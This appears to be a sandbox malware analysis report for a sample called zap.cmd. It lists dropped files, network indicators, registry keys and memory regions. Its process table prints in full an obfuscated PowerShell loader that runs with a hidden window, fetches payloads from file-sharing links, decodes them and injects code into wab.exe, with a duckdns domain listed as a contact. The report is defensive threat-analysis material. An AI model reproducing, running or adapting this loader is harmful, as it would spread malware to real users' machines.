Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
zap.cmd
|
ASCII text, with very long lines (6428), with no line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1t0oza4b.equ.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2wkmyrx3.t4j.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rrriaff2.3le.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_upabvupi.4vk.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Belejringstilstandenes.Unj
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\EOGWFIPGPL7TCFT7EKZ8.temp
|
data
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\zap.cmd" "
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe -windowstyle hidden "$Monostelous = 1;$Fomented='Sub';$Fomented+='strin';$Fomented+='g';Function Upstair91($Contrive){$Noontide=$Contrive.Length-$Monostelous;For($Bortskaffelsesmetode=5;$Bortskaffelsesmetode
-lt $Noontide;$Bortskaffelsesmetode+=6){$Savnes+=$Contrive.$Fomented.Invoke( $Bortskaffelsesmetode, $Monostelous);}$Savnes;}function
Skizoide($Cheanne){.($Scrimshorn) ($Cheanne);}$Lagenens=Upstair91 'automMSkvisoSamoazBi.eliNuclelMis ilSla,ea.vern/Vek.e5Unmag.
Inf 0 Aaha Spade(UnrelW Im eiTatusnEk,pedTilkeoTrykkwIconos gumm vent.N VillTAtion Outse1 Efte0 Numm.,hoog0 Nabo;Skrot UkyndWcheiriP.ddenRokad6
Unde4Diara;Nanny Hus.exSelvg6Bikse4Konsu;Dagso Kor.fr Ego v Ripo:Helul1 lau2Overn1Perio. Hove0Genre) ,ugt ReplGRemnfeCor.ecPre,okNonvaoAfpas/Myste2Diaer0Lre
r1Trich0Svanh0Pauci1condu0op.ak1,elss SemitF Oilsi,asserLu.thePriesf UoploLittex G.de/Snr l1 Caud2,hole1 .pre. Lobb0Savou
';$Unrevengingly166=Upstair91 'PeepiU Fl es,ndisePerv r Pins- Al,oAapprigSpadeeFil,nnGenavtNonfe ';$Stot=Upstair91 'ren rhBevistKedeltNiellpFortrsFotom:Selvh/
Acke/Bjergwfilbew.oncowBilla.Ov rss SisaeSamarnRefridE melsndvenpStimea Sangc Bukse Bes,.TempecCero,oPizzimMaste/BenaapKviltrstangofluff/AppoidProcelPrint/Va
ut5Tet amCirku5OpspraReset1SolfauOp ys ';$Detonate=Upstair91 ',nthr>opbev ';$Scrimshorn=Upstair91 'Latkeis.igpe ballxKompr
';$Pelagia123='Tordnes';$Udpressede = Upstair91 'CirereTredic StaihSvrscoMetr. Filmm%Vildka A,phplill,pEstradR,misaPersptmanu.aInter%Bre,s\RestiBGenn,eEkseklVold
eSoogejU,drarEdg,miFolkenSkorsgSt.nds PunctLope.iInduslbacitsHenhrtUnde.aKrgebn Bigfdfarvee .opon nomie KontsTyvep.SammeU
Turbn Ta zjVeggi appli&R.dio&Udlov FikseDrypncUforuh CoinoAnde. Te,rt,fslu ';Skizoide (Upstair91 ' Ba d$Hon.rg Peril .outo
GebrbSulfoa udsklSypho:kunneSRigsbk,interSynkats,emme M skr .ueleFlagegBiliniInform MoopeCinchnHovedtD trse SemitrneresLandi=Arbe,(Su,recReflemThinodTj.ne
Medit/SpkhucTa.ul Amtsk$S adsUGrabbd HelspW,ener RenteDickysflorisS gareElderd EtlyeL,ane)maler ');Skizoide (Upstair91 'Ra,le$Sabelg
ForslSloppo Ge sbKo.teaGrae,l Trac:spredBO.rejeTautnsIliadtRumvgrM risesam enStyrtdEftereCrowdsuropf=Vnget$Gr geSTvangtSm
leoBan.stBlo.s.Poulis PhalpGrimrlD,visiDebittKamuf(Chest$L.cidDAdelseLydentMatteoCamern rackaSammetSiklie page) Redo ');$Stot=$Bestrendes[0];$songtress=
(Upstair91 'Fri b$ StegglaanslLimitoStd ubInitiaGroenlAande: SkakS ,carpDundye MusocBi,tekVaretl FavoeCovendpayba= For,NSelvmeEnkepwLyrik-SekstO
D,ukb.ommajTubuleExci.cOrigitBandl RouleSHj.teyRendes KlbetVaasee istimSecco.VirgiNoddf eforhit Jagg. oitfWTiltueShakeb RefrCProcelTerm,iJassieStrafnun.ott');$songtress+=$Skrteregimentets[1];Skizoide
($songtress);Skizoide (Upstair91 'Inca.$ stinSOvervpCarboephiltcA.sinkBo.bll.aveteKnackdEwder.PolisHHalvmeLe inaBije,dShik,e
olyr Tagms Blg [Visc $ LudhUFhovenPy,pnrKole eRejsevZooloeephebnHomilgUd.kiiRe,hinme epgU.homlFodb,yBarog1Cepha6Wolfe6Ru,tp]
Pen,=Hom g$Vol,mLCl,quaVand.g LyseeZi.kbnVejreeDislen IndbsAfhen ');$Skriftfontene=Upstair91 ' obeg$ RepeSNadjapSchnaeSkruecPupilkCrinalUnbreeAutocdbandl.AmritDdrossoFy.baw,oachnOverslc,athoStreja
Toold,etirFTekstiFaseil.ilsveLysen(Aigre$WeediSKonvotPlo moMa,totNonau,popul$UnlivI sig,nTur,etTrut eCoenan PrtesPavi iKvrkno
Stu,n Gorga LeaclTr nc)mbels ';$Intensional=$Skrteregimentets[0];Skizoide (Upstair91 'Ra po$S.ruvg Fo hlmurbro Ci.ibDestiaaestelDre,n:C,nsueBugvgmResole
ForseStartrTrdniaKirsetBoldbe CorusCerat=spiri(SekstTManedeTrillsSkih.tUnpre- Br.sPGaskoa igedtdekath Refe ,agso$M.gaaIBegranBrt
etBl,ndeNodalnSkov,sAflysiSpotto o,ernNonocaD ueslCyclo)Xylob ');while (!$emeerates) {Skizoide (Upstair91 'Sprj,$ sun.g l.anl
FremoFormyb ElecaStre,lModek:MelleRHand,ebrnekbUdtrrsOndsilberyla Nonrg AfgieLaparrcage.i Phy.eBaskerLodurnKlapseOuthusTrans=
tr,k$UmbratRek.irKogeru,ranseKloni ') ;Skizoide $Skriftfontene;Skizoide (Upstair91 'EquesSPneomtNonfeaUnparrhydrotBa,ue- TriaSKlipslS,aveeRebrueIndbyp
fraa Pm g4Hirds ');Skizoide (Upstair91 'Emoti$m.colgOxindl J.ffoOverfbSyn aa Beakl idio:Aksele Alepm NeareDetaceanaphrEnlara
.chitWri heUncoms D.ro=U.tag(UhudeT PytheDe its UttetT,yin-OversPPikniaFde.atTri,mh,usin Kuper$HurriI inivnco.mstOutqueNervsnSuccesBestriFerskoSportnMultiaProgrlChudd)Ste
o ') ;Skizoide (Upstair91 'Prere$PortigObse,lSprogoA,modbDialeaVkkell Skri:S.derD opulaSignit LancaVaeltkHamleoRoqu.pTorskifolkeeProdurForel=Farve$charogPi.bilJ.risoRe,ktb
ripua BoldlSlagt:StoittKorntv HeptiKrepts unestHyeniesvalem Forea.latfaBeroll Van.eSociatDgnbo+Komma+Emplo%,ltro$MolifBUngoleArsensIndfatDvrgbrForsvenucl
nL gemdNym leForehsSup,l.Werchc,antaoMult,uErikonB,okitLreme ') ;$Stot=$Bestrendes[$Datakopier];}$Medicean=328833;$Edifyingly=28336;Skizoide
(Upstair91 'Def n$Palaeg UddelanthroSeriebWaygoachapalUniax:IgnorSPrisoiAdorip.oronpHyperepaa.in oderi Un ipOverdp VouceMohawrbunkis.acif
.owkn= Anti SedaGNondeeCoadjt C.nz-Bo,tvC H,shoUra onunappt Are eo,erdnImmigt Spoi Apu,$ MistITeg,enDo.zat ImmueOpmrknTranss
GodhitredkoProtonElephastuntlIndse ');Skizoide (Upstair91 'Squin$NainsgCartol fprvoSentibSquawaTrvl,l Crem:ser.iVGroe,iForgnb
rdkirAf,oraAs,ettRavneiTaupeoM.slanBasti unsol=Glans Rembo[ ,ephSVaarbyAnostsChieftTempeeN.nvamback,.Coni.CRilleoSkursnTeg,iv
SelsealmocrBar etTrvem]Backl:Bopls: AssiFGulp rIndreoUtaalm,tenkBSan.ta LkkesVensteteolo6Fordu4AtomkSTenortUnamirPr.gri Eften
,adigProwe( Tera$CurraSPeritiSvi.gpCountpSnvreePodern ForaiCl mbpVarmepMosque Hyd r Bej.sLastb)konst ');Skizoide (Upstair91
' M,cr$ rangUnsa,l SkoloH,klebNon,naDemenl Peop:DarkeSOscitu Unsmcdickic .breeTransspo,dwdHa.vea DesptT,lkna L ngm FronaE.lust.ornueT.berrRelegsPre.o
Poste=Forsy Askeb[,elikSThingyVenacsUdtagtIndigeSgnehmCook,.SelvlTBr iseScuttxKlabatSolec.EfterEstdtnn KemscTlperoRrhatd CaliiCacomnS.rorg
,lat]Carca: Popu:GowidAVindeSSleepCCistvIOve,sINud e.CapriGstamteSignot CondSSlad.tIsomorVortiiHvortnTidskgadfix(Skues$ kontVvilheiIdiotbFasturIndiva
Lovpt,randi.ekunoAlkahnStyre)Vermi ');Skizoide (Upstair91 ' Jrun$Zi,akgAutoglPuanboInforbR,ppeaOpiatlUdkom:AbstiL TopgiB aisvCituasPurisv
ProliCigarg L,setUrbatiRenh,g QuineRimelsSalve=Plasm$F ltrS .hinuBustec I,itcUn.eseFortas randd afn aUtr,ltForsuaColpomFlappaFj,rntFormueSedderUdfrdsUdsli.Ki.bosrwandu
SnurbEnkepsToetotBridgrAtheniRentenHa,legUndiv(Di,mi$,mstaMMachaeZinkedTrouviNordbcProtoe DobbaGlessnUigen, H,rs$LonghEAndend
OveriGe esfMotoryDawisi SjlenImitagunmuflInt ryNondi)Krlh. ');Skizoide $Livsvigtiges;"
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belejringstilstandenes.Unj && echo t"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Monostelous = 1;$Fomented='Sub';$Fomented+='strin';$Fomented+='g';Function
Upstair91($Contrive){$Noontide=$Contrive.Length-$Monostelous;For($Bortskaffelsesmetode=5;$Bortskaffelsesmetode -lt $Noontide;$Bortskaffelsesmetode+=6){$Savnes+=$Contrive.$Fomented.Invoke(
$Bortskaffelsesmetode, $Monostelous);}$Savnes;}function Skizoide($Cheanne){.($Scrimshorn) ($Cheanne);}$Lagenens=Upstair91
'automMSkvisoSamoazBi.eliNuclelMis ilSla,ea.vern/Vek.e5Unmag. Inf 0 Aaha Spade(UnrelW Im eiTatusnEk,pedTilkeoTrykkwIconos
gumm vent.N VillTAtion Outse1 Efte0 Numm.,hoog0 Nabo;Skrot UkyndWcheiriP.ddenRokad6 Unde4Diara;Nanny Hus.exSelvg6Bikse4Konsu;Dagso
Kor.fr Ego v Ripo:Helul1 lau2Overn1Perio. Hove0Genre) ,ugt ReplGRemnfeCor.ecPre,okNonvaoAfpas/Myste2Diaer0Lre r1Trich0Svanh0Pauci1condu0op.ak1,elss
SemitF Oilsi,asserLu.thePriesf UoploLittex G.de/Snr l1 Caud2,hole1 .pre. Lobb0Savou ';$Unrevengingly166=Upstair91 'PeepiU
Fl es,ndisePerv r Pins- Al,oAapprigSpadeeFil,nnGenavtNonfe ';$Stot=Upstair91 'ren rhBevistKedeltNiellpFortrsFotom:Selvh/ Acke/Bjergwfilbew.oncowBilla.Ov
rss SisaeSamarnRefridE melsndvenpStimea Sangc Bukse Bes,.TempecCero,oPizzimMaste/BenaapKviltrstangofluff/AppoidProcelPrint/Va
ut5Tet amCirku5OpspraReset1SolfauOp ys ';$Detonate=Upstair91 ',nthr>opbev ';$Scrimshorn=Upstair91 'Latkeis.igpe ballxKompr
';$Pelagia123='Tordnes';$Udpressede = Upstair91 'CirereTredic StaihSvrscoMetr. Filmm%Vildka A,phplill,pEstradR,misaPersptmanu.aInter%Bre,s\RestiBGenn,eEkseklVold
eSoogejU,drarEdg,miFolkenSkorsgSt.nds PunctLope.iInduslbacitsHenhrtUnde.aKrgebn Bigfdfarvee .opon nomie KontsTyvep.SammeU
Turbn Ta zjVeggi appli&R.dio&Udlov FikseDrypncUforuh CoinoAnde. Te,rt,fslu ';Skizoide (Upstair91 ' Ba d$Hon.rg Peril .outo
GebrbSulfoa udsklSypho:kunneSRigsbk,interSynkats,emme M skr .ueleFlagegBiliniInform MoopeCinchnHovedtD trse SemitrneresLandi=Arbe,(Su,recReflemThinodTj.ne
Medit/SpkhucTa.ul Amtsk$S adsUGrabbd HelspW,ener RenteDickysflorisS gareElderd EtlyeL,ane)maler ');Skizoide (Upstair91 'Ra,le$Sabelg
ForslSloppo Ge sbKo.teaGrae,l Trac:spredBO.rejeTautnsIliadtRumvgrM risesam enStyrtdEftereCrowdsuropf=Vnget$Gr geSTvangtSm
leoBan.stBlo.s.Poulis PhalpGrimrlD,visiDebittKamuf(Chest$L.cidDAdelseLydentMatteoCamern rackaSammetSiklie page) Redo ');$Stot=$Bestrendes[0];$songtress=
(Upstair91 'Fri b$ StegglaanslLimitoStd ubInitiaGroenlAande: SkakS ,carpDundye MusocBi,tekVaretl FavoeCovendpayba= For,NSelvmeEnkepwLyrik-SekstO
D,ukb.ommajTubuleExci.cOrigitBandl RouleSHj.teyRendes KlbetVaasee istimSecco.VirgiNoddf eforhit Jagg. oitfWTiltueShakeb RefrCProcelTerm,iJassieStrafnun.ott');$songtress+=$Skrteregimentets[1];Skizoide
($songtress);Skizoide (Upstair91 'Inca.$ stinSOvervpCarboephiltcA.sinkBo.bll.aveteKnackdEwder.PolisHHalvmeLe inaBije,dShik,e
olyr Tagms Blg [Visc $ LudhUFhovenPy,pnrKole eRejsevZooloeephebnHomilgUd.kiiRe,hinme epgU.homlFodb,yBarog1Cepha6Wolfe6Ru,tp]
Pen,=Hom g$Vol,mLCl,quaVand.g LyseeZi.kbnVejreeDislen IndbsAfhen ');$Skriftfontene=Upstair91 ' obeg$ RepeSNadjapSchnaeSkruecPupilkCrinalUnbreeAutocdbandl.AmritDdrossoFy.baw,oachnOverslc,athoStreja
Toold,etirFTekstiFaseil.ilsveLysen(Aigre$WeediSKonvotPlo moMa,totNonau,popul$UnlivI sig,nTur,etTrut eCoenan PrtesPavi iKvrkno
Stu,n Gorga LeaclTr nc)mbels ';$Intensional=$Skrteregimentets[0];Skizoide (Upstair91 'Ra po$S.ruvg Fo hlmurbro Ci.ibDestiaaestelDre,n:C,nsueBugvgmResole
ForseStartrTrdniaKirsetBoldbe CorusCerat=spiri(SekstTManedeTrillsSkih.tUnpre- Br.sPGaskoa igedtdekath Refe ,agso$M.gaaIBegranBrt
etBl,ndeNodalnSkov,sAflysiSpotto o,ernNonocaD ueslCyclo)Xylob ');while (!$emeerates) {Skizoide (Upstair91 'Sprj,$ sun.g l.anl
FremoFormyb ElecaStre,lModek:MelleRHand,ebrnekbUdtrrsOndsilberyla Nonrg AfgieLaparrcage.i Phy.eBaskerLodurnKlapseOuthusTrans=
tr,k$UmbratRek.irKogeru,ranseKloni ') ;Skizoide $Skriftfontene;Skizoide (Upstair91 'EquesSPneomtNonfeaUnparrhydrotBa,ue- TriaSKlipslS,aveeRebrueIndbyp
fraa Pm g4Hirds ');Skizoide (Upstair91 'Emoti$m.colgOxindl J.ffoOverfbSyn aa Beakl idio:Aksele Alepm NeareDetaceanaphrEnlara
.chitWri heUncoms D.ro=U.tag(UhudeT PytheDe its UttetT,yin-OversPPikniaFde.atTri,mh,usin Kuper$HurriI inivnco.mstOutqueNervsnSuccesBestriFerskoSportnMultiaProgrlChudd)Ste
o ') ;Skizoide (Upstair91 'Prere$PortigObse,lSprogoA,modbDialeaVkkell Skri:S.derD opulaSignit LancaVaeltkHamleoRoqu.pTorskifolkeeProdurForel=Farve$charogPi.bilJ.risoRe,ktb
ripua BoldlSlagt:StoittKorntv HeptiKrepts unestHyeniesvalem Forea.latfaBeroll Van.eSociatDgnbo+Komma+Emplo%,ltro$MolifBUngoleArsensIndfatDvrgbrForsvenucl
nL gemdNym leForehsSup,l.Werchc,antaoMult,uErikonB,okitLreme ') ;$Stot=$Bestrendes[$Datakopier];}$Medicean=328833;$Edifyingly=28336;Skizoide
(Upstair91 'Def n$Palaeg UddelanthroSeriebWaygoachapalUniax:IgnorSPrisoiAdorip.oronpHyperepaa.in oderi Un ipOverdp VouceMohawrbunkis.acif
.owkn= Anti SedaGNondeeCoadjt C.nz-Bo,tvC H,shoUra onunappt Are eo,erdnImmigt Spoi Apu,$ MistITeg,enDo.zat ImmueOpmrknTranss
GodhitredkoProtonElephastuntlIndse ');Skizoide (Upstair91 'Squin$NainsgCartol fprvoSentibSquawaTrvl,l Crem:ser.iVGroe,iForgnb
rdkirAf,oraAs,ettRavneiTaupeoM.slanBasti unsol=Glans Rembo[ ,ephSVaarbyAnostsChieftTempeeN.nvamback,.Coni.CRilleoSkursnTeg,iv
SelsealmocrBar etTrvem]Backl:Bopls: AssiFGulp rIndreoUtaalm,tenkBSan.ta LkkesVensteteolo6Fordu4AtomkSTenortUnamirPr.gri Eften
,adigProwe( Tera$CurraSPeritiSvi.gpCountpSnvreePodern ForaiCl mbpVarmepMosque Hyd r Bej.sLastb)konst ');Skizoide (Upstair91
' M,cr$ rangUnsa,l SkoloH,klebNon,naDemenl Peop:DarkeSOscitu Unsmcdickic .breeTransspo,dwdHa.vea DesptT,lkna L ngm FronaE.lust.ornueT.berrRelegsPre.o
Poste=Forsy Askeb[,elikSThingyVenacsUdtagtIndigeSgnehmCook,.SelvlTBr iseScuttxKlabatSolec.EfterEstdtnn KemscTlperoRrhatd CaliiCacomnS.rorg
,lat]Carca: Popu:GowidAVindeSSleepCCistvIOve,sINud e.CapriGstamteSignot CondSSlad.tIsomorVortiiHvortnTidskgadfix(Skues$ kontVvilheiIdiotbFasturIndiva
Lovpt,randi.ekunoAlkahnStyre)Vermi ');Skizoide (Upstair91 ' Jrun$Zi,akgAutoglPuanboInforbR,ppeaOpiatlUdkom:AbstiL TopgiB aisvCituasPurisv
ProliCigarg L,setUrbatiRenh,g QuineRimelsSalve=Plasm$F ltrS .hinuBustec I,itcUn.eseFortas randd afn aUtr,ltForsuaColpomFlappaFj,rntFormueSedderUdfrdsUdsli.Ki.bosrwandu
SnurbEnkepsToetotBridgrAtheniRentenHa,legUndiv(Di,mi$,mstaMMachaeZinkedTrouviNordbcProtoe DobbaGlessnUigen, H,rs$LonghEAndend
OveriGe esfMotoryDawisi SjlenImitagunmuflInt ryNondi)Krlh. ');Skizoide $Livsvigtiges;"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belejringstilstandenes.Unj && echo t"
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
xgmn934.duckdns.org
|
|
||
|
https://fs03n3.sendspace.com/dlpro/6e53a87522bbc42d52425dcdcc286e6c/664f939a/wyg3h5/SKAsvg71.bin2d52
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://fs03n3.sendspace.com/dlpro/6e53a87522bbc42d52425dcdcc286e6c/664f939a/wyg3h5/SKAsvg71.binj92
|
unknown
|
||
|
https://www.sendspace.com/pro/dl/wyg3h5
|
172.67.170.105
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://fs13n3.sendspaX
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://fs03n3.sendspace.com/m6
|
unknown
|
||
|
https://fs03n3.sendspace.com/dlpro/6e53a87522bbc42d52425dcdcc286e6c/664f939a/wyg3h5/SKAsvg71.bin8F4H
|
unknown
|
||
|
http://www.sendspace.com
|
unknown
|
||
|
https://www.sendspace.com/pro/dl/5m5a1uP
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://www.sendspace.com
|
unknown
|
||
|
https://www.sendspace.com/pro/dl/wyg3h5z
|
unknown
|
||
|
https://fs03n3.sendspace.com/
|
unknown
|
||
|
http://crl.micro
|
unknown
|
||
|
https://fs03n3.sendspace.com/dlpro/6e53a87522bbc42d52425dcdcc286e6c/664f939a/wyg3h5/SKAsvg71.binotBe
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
https://fs03n3.sendspace.com/dlpro/6e53a87522bbc42d52425dcdcc286e6c/664f939a/wyg3h5/SKAsvg71.bin
|
69.31.136.17
|
||
|
https://fs03n3.sendspace.com/I6
|
unknown
|
||
|
https://fs03n3.sendspace.com/dlpro/6e53a87522bbc42d52425dcdcc286e6c/664f939a/wyg3h5/SKAsvg71.binP93
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://fs13n3.sendspace.com/dlpro/3c9fc79de649f1492cc7b06003ebcaeb/664f936b/5m5a1u/Tyvstjlendes.pfb
|
69.31.136.57
|
||
|
http://fs13n3.sendspace.com
|
unknown
|
||
|
https://fs13n3.sendspace.com
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://www.sendspace.com/pro/dl/5m5a1uXRul
|
unknown
|
||
|
https://www.sendspace.com/pro/dl/5m5a1u
|
172.67.170.105
|
||
|
https://www.sendspace.com/pro/dl/wyg3h5j83
|
unknown
|
There are 25 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
xgmn934.duckdns.org
|
12.202.180.134
|
|
|
|
fs13n3.sendspace.com
|
69.31.136.57
|
||
|
fs03n3.sendspace.com
|
69.31.136.17
|
||
|
www.sendspace.com
|
172.67.170.105
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
12.202.180.134
|
xgmn934.duckdns.org
|
United States
|
|
|
|
69.31.136.17
|
fs03n3.sendspace.com
|
United States
|
||
|
172.67.170.105
|
www.sendspace.com
|
United States
|
||
|
69.31.136.57
|
fs13n3.sendspace.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
5EA6000
|
trusted library allocation
|
page read and write
|
|
|
|
2046AEC5000
|
trusted library allocation
|
page read and write
|
|
|
|
A036000
|
direct allocation
|
page execute and read and write
|
|
|
|
25F31000
|
trusted library allocation
|
page read and write
|
|
|
|
4FE6000
|
remote allocation
|
page execute and read and write
|
|
|
|
8BF0000
|
direct allocation
|
page execute and read and write
|
|
|
|
7930000
|
trusted library allocation
|
page read and write
|
||
|
2045B2F4000
|
trusted library allocation
|
page read and write
|
||
|
2045B6DB000
|
trusted library allocation
|
page read and write
|
||
|
A680000
|
direct allocation
|
page read and write
|
||
|
8A2C000
|
stack
|
page read and write
|
||
|
2046AE51000
|
trusted library allocation
|
page read and write
|
||
|
8C00000
|
direct allocation
|
page read and write
|
||
|
2FF9000
|
heap
|
page read and write
|
||
|
2820B000
|
trusted library allocation
|
page read and write
|
||
|
25DF0000
|
trusted library allocation
|
page read and write
|
||
|
2045CE71000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAE0000
|
trusted library allocation
|
page read and write
|
||
|
28450000
|
trusted library allocation
|
page read and write
|
||
|
2046AE71000
|
trusted library allocation
|
page read and write
|
||
|
20473002000
|
heap
|
page read and write
|
||
|
7FFD9B950000
|
trusted library allocation
|
page execute and read and write
|
||
|
2045B2F6000
|
trusted library allocation
|
page read and write
|
||
|
8730000
|
trusted library allocation
|
page read and write
|
||
|
7280000
|
direct allocation
|
page read and write
|
||
|
7AD0000
|
trusted library allocation
|
page read and write
|
||
|
6926839000
|
stack
|
page read and write
|
||
|
A410000
|
heap
|
page read and write
|
||
|
5324000
|
trusted library allocation
|
page read and write
|
||
|
31EF000
|
stack
|
page read and write
|
||
|
2045B2E0000
|
trusted library allocation
|
page read and write
|
||
|
2821E000
|
trusted library allocation
|
page read and write
|
||
|
69265FE000
|
stack
|
page read and write
|
||
|
2CFE000
|
stack
|
page read and write
|
||
|
A5C3000
|
heap
|
page read and write
|
||
|
2FAD000
|
stack
|
page read and write
|
||
|
7958000
|
trusted library allocation
|
page read and write
|
||
|
25CF0000
|
heap
|
page read and write
|
||
|
20458E00000
|
heap
|
page read and write
|
||
|
81E6000
|
remote allocation
|
page execute and read and write
|
||
|
2045A920000
|
trusted library allocation
|
page read and write
|
||
|
255A0000
|
direct allocation
|
page read and write
|
||
|
3270000
|
trusted library allocation
|
page execute and read and write
|
||
|
28460000
|
trusted library allocation
|
page read and write
|
||
|
8C30000
|
direct allocation
|
page read and write
|
||
|
7B00000
|
trusted library allocation
|
page read and write
|
||
|
25DF0000
|
trusted library allocation
|
page read and write
|
||
|
25580000
|
direct allocation
|
page read and write
|
||
|
78D0000
|
trusted library allocation
|
page read and write
|
||
|
2045AA00000
|
heap
|
page read and write
|
||
|
28470000
|
trusted library allocation
|
page read and write
|
||
|
8784000
|
heap
|
page read and write
|
||
|
7AB0000
|
trusted library allocation
|
page read and write
|
||
|
4B2E000
|
stack
|
page read and write
|
||
|
70EE000
|
stack
|
page read and write
|
||
|
85ED000
|
stack
|
page read and write
|
||
|
3152000
|
heap
|
page read and write
|
||
|
25DDE000
|
stack
|
page read and write
|
||
|
76E1000
|
heap
|
page read and write
|
||
|
2045B2D4000
|
trusted library allocation
|
page read and write
|
||
|
28240000
|
trusted library allocation
|
page read and write
|
||
|
20459080000
|
heap
|
page read and write
|
||
|
5384000
|
trusted library allocation
|
page read and write
|
||
|
284E0000
|
trusted library allocation
|
page read and write
|
||
|
199A82BB000
|
heap
|
page read and write
|
||
|
7FFD9BAD0000
|
trusted library allocation
|
page read and write
|
||
|
28450000
|
trusted library allocation
|
page read and write
|
||
|
8B40000
|
trusted library allocation
|
page execute and read and write
|
||
|
6FEE000
|
stack
|
page read and write
|
||
|
706E000
|
stack
|
page read and write
|
||
|
3267000
|
trusted library allocation
|
page execute and read and write
|
||
|
25C50000
|
remote allocation
|
page read and write
|
||
|
25DF0000
|
trusted library allocation
|
page read and write
|
||
|
6C2C000
|
stack
|
page read and write
|
||
|
7FFD9B784000
|
trusted library allocation
|
page read and write
|
||
|
284E0000
|
trusted library allocation
|
page read and write
|
||
|
2613A000
|
trusted library allocation
|
page read and write
|
||
|
32ED000
|
trusted library allocation
|
page execute and read and write
|
||
|
284E0000
|
trusted library allocation
|
page read and write
|
||
|
325A000
|
trusted library allocation
|
page execute and read and write
|
||
|
20473160000
|
heap
|
page read and write
|
||
|
4B30000
|
heap
|
page execute and read and write
|
||
|
28E5B000
|
stack
|
page read and write
|
||
|
8BCD000
|
stack
|
page read and write
|
||
|
28F60000
|
trusted library allocation
|
